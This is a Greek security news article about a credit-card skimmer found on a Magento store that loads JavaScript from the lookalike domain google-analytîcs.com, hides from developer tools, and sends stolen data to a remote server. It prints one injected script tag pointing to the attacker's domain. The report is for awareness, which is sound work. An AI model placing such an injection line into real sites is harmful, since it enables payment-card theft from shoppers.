Κυριακή, 5 Απριλίου, 16:14
Αρχική security Κακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

Κακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

skimmer Οι εγκληματίες του κυβερνοχώρου βρήκαν ένα νέο τρόπο να κλέψουν χρήματα από χρήστες, που κάνουν online συναλλαγές. Οι hackers χρησιμοποιούν ψεύτικα domains, τα οποία υποτίθεται ότι είναι της Google, και οδηγούν τους χρήστες σε παραβιασμένα sites. Βλέποντας το domain, οι χρήστες νομίζουν ότι το site είναι ασφαλές. Κάποιοι ερευνητές από την εταιρεία Sucuri ήρθαν σε επικοινωνία με έναν ιδιοκτήτη ενός Magento website, και ενημερώθηκαν ότι ένα domain είχε μολυνθεί με ένα skimmer πιστωτικών καρτών. Το skimmer χρησιμοποιεί κώδικα JavaScript, που περιέχει έναν σύνδεσμο με την κακόβουλη διεύθυνση google-analytîcs [.] Com.

Ακολουθεί ένα παράδειγμα του κακόβουλου κώδικα:

<script type = “text / javascript” src = “//google-analytîcs.com/www.[redacted]/3f5cf4657d5d9.js”> </ script>

Οι ερευνητές είπαν ότι οι hackers χρησιμοποιούν αξιόπιστα ονόματα, όπως η Google, και έτσι οι επισκέπτες νομίζουν ότι τα sites είναι ασφαλή. Δεν προσέχουν, όμως, ότι υπάρχει μια διαφοροποίηση στο domain, που υποδεικνύει ότι πρόκειται για κακόβουλο site.

Οι ερευνητές ανακάλυψαν ότι το συγκεκριμένο skimmer είναι παρόμοιο με άλλα που κυκλοφορούν και αποθηκεύει δεδομένα, που εισάγονται, καθώς και drop-down menu επιλογές.

Ωστόσο, το skimmer ελέγχει αν χρησιμοποιούνται developer tools είτε στο Google Chrome είτε στο Mozilla Firefox. Στην περίπτωση που χρησιμοποιούνται, δεν θα επιχειρήσει να κλέψει οποιαδήποτε πληροφορία για να αποφύγει την ανίχνευση.

Αν δεν εντοπιστούν developer tools, κλέβει πληροφορίες και τις στέλνει σε έναν απομακρυσμένο server.

Τα card skimmers εγκαθίστανται μέσω ευάλωτων sites ηλεκτρονικού εμπορίου και αποτελούν ένα σοβαρό και συχνό πρόβλημα. Τον Ιούλιο, η εταιρεία λογισμικού RiskIQ δήλωσε ότι μια πρόσφατη εκστρατεία κατάφερε να μολύνει πάνω από 17.000 websites με card-skimming malware μέσα σε λίγους μόνο μήνες.

Οι χρήστες του Magento, όπως και του WordPress και του Drupal πρέπει να ενημερώνουν συνεχώς τα λογισμικά τους. Τα Magento domains αποτελούν στόχο των hackers, που προσπαθούν να κλέψουν οικονομικά δεδομένα. Μια έκθεση έδειξε ότι το 2018, το 83% των Magento websites βρέθηκαν να είναι ευάλωτα στα card skimmers.

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here

LIVE NEWS

Πώς μπορείτε να συνδέσετε ένα μικρόφωνο στο MacBook σας;

Πολλοί άνθρωποι που ξαφνικά πρέπει να πραγματοποιούν βιντεοκλήσεις ή τηλεδιασκέψεις, είτε για την δουλειά τους είτε για online μαθήματα, έρχονται καθημερινά αντιμέτωποι...

COVID-19: Οργανισμοί ανθρωπίνων δικαιωμάτων προειδοποιούν τις κυβερνήσεις που παρακολουθούν πολίτες

Ο COVID-19 έχει αναγκάσει πολλές κυβερνήσεις να πάρουν ακραία μέτρα, όπως να παρακολουθούν τους πολίτες. Περίπου 110...

Απομακρυσμένη εργασία: Πώς μπορούν να “επιβιώσουν” οι επιχειρήσεις;

Η απομακρυσμένη εργασία είναι μία πολιτική που ακολουθούν επιχειρήσεις όλων των μεγεθών ενόψει της πανδημίας του Κορωνοϊού. Τις τελευταίες εβδομάδες έχει σημειωθεί...

Samsung: Δωρεά αξίας $ 29 εκατομμυρίων για την μάχη ενάντια στον κορωνοϊό

Η Samsung Electronics προχώρησε σε μια δωρεά αξίας $ 29 εκατομμυρίων σε κυβερνήσεις και κοινότητες που έχουν...

Με παρακολουθεί το αφεντικό μου όσο εργάζομαι από το σπίτι;

Με παρακολουθεί το αφεντικό μου όσο εργάζομαι από το σπίτι; Έχετε αναρωτηθεί αν αυτές τις μέρες -λόγω πανδημίας η πλειοψηφία εργάζεται από...

Επιθέσεις Ransomware και DDoS: Οι κυβερνοεγκληματίες εντείνουν τις δραστηριότητές τους εν μέσω του κορωνοϊού

Οι εγκληματίες του κυβερνοχώρου χρησιμοποιούν τις ανησυχίες γύρω από την επιδημία του κορωνοϊού σε μια προσπάθεια μεγιστοποίησης του αντίκτυπου των επιθέσεων...

Ερευνητές προτείνουν μέθοδο παρακολούθησης του κορωνοϊού μέσω των smartphone

Καθώς ο COVID-19 συνεχίζει να εξαπλώνεται, οι ερευνητικές ομάδες σε ολόκληρο τον κόσμο χρησιμοποιούν το χρόνο και τις δεξιότητές τους για να...

Το μήνυμα της Zoom προς τους πελάτες της για τα θέματα ασφαλείας

Μετά την πρόσφατη ανακάλυψη των κενών ασφαλείας στην εφαρμογή Zoom, η εταιρεία δημοσίευσε μία επίσημη απάντηση προς...

Cache: Κρυμμένα αρχεία στην προσωρινή μνήμη επιβραδύνουν το Google Chrome

Το Google Chrome ανήκει στην κατηγορία των πιο δημοφιλών browsers και χρησιμοποιείται από μεγάλο ποσοστό χρηστών. Ωστόσο, έχει ένα σημαντικό αρνητικό χαρακτηριστικό...

Πώς να συνδέσω και να ρυθμίσω ακουστικά στο Windows 10 PC;

Τα ακουστικά είναι ένα πολύ χρήσιμο εργαλείο επικοινωνίας, ιδιαίτερα αυτή την περίοδο, που οι περισσότεροι εργαζόμαστε από...